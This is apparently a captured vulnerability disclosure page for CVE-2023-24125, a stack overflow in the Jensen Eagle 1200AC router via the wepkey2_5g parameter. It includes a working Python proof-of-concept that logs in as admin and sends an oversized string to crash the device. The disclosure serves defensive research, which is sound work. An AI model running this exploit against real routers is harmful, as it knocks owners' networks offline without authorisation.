oxnan.com
URL:
https://oxnan.com/posts/WifiBasic_wepkey2_5g_DoS
Submission: On March 08 via api from US — Scanned from NL
[CVE-2023-24125] DOS VIA WEPKEY2_5G PARAMETER IN EAGLE 1200AC

DESCRIPTION

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey2_5g parameter at /goform/WifiBasicSet.

ADDITIONAL INFORMATION

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepkey2_5g is stored into wl5g.extra.wep_key2 via SetValue. When /goform/WifiBasicGet (formWifiBasicGet) is then called, the string is loaded from wl5g.extra.wep_key2 and stored into the stack buffer wifi_buf_entry. Because the length of wepkey2_5g is not checked, a large string overflows the stack buffer.

POC SCRIPT:

    import requests

    IP = "192.168.38.1"
    logindata = {
        "username": "admin",
        "password": "81dc9bdb52d04dc20036dbd8313ed055"
    }

    def login():
        # Retry the login until the device returns the "password" session cookie
        for i in range(10):
            session = requests.Session()
            res = session.post(f"http://{IP}/login/Auth", data=logindata)
            try:
                passwd = session.cookies["password"]
                return passwd
            except KeyError:
                # Cookie not set on this attempt; try again
                pass

    session = requests.Session()
    session.cookies.set("password", login())

    # Store an oversized wepkey2_5g value via formWifiBasicSet
    payload = {
        "wepkey2_5g": "A" * (0x1000),
        "security": "wep"
    }
    res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
    print(res.status_code)

    # formWifiBasicGet loads the stored value into the stack buffer
    res = session.post(f"http://{IP}/goform/WifiBasicGet")
    print(res.text)
    print(res)